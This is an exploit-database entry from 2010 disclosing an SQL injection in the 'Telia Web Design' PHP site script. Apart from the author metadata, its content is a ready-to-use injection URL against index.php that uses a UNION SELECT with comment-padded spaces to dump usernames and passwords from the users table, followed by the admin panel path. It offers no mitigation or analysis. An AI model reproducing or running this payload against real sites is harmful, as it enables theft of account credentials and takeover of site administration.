Telia Web Design - 'index.php' SQL Injection

EDB-ID:

12717

CVE:

N/A

Author:

CoBRa_21

Type:

webapps

Platform:

PHP

Published:

2010-05-24

-------------------------------------------------------------------------------------------

Telia Web Design (index.php) SQL Injection Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Mail: uyku_cu@windowslive.com

Script Home: http://www.telia.co.gr/

-------------------------------------------------------------------------------------------

Sql Injection:

http://localhost/[path]/index.php?module=content&action=article&id=-80/**/union/**/select/**/group_concat(username,0x3a,password),2/**/from/**/users


Admin Panel

http://localhost/[path]/admin
-------------------------------------------------------------------------------------------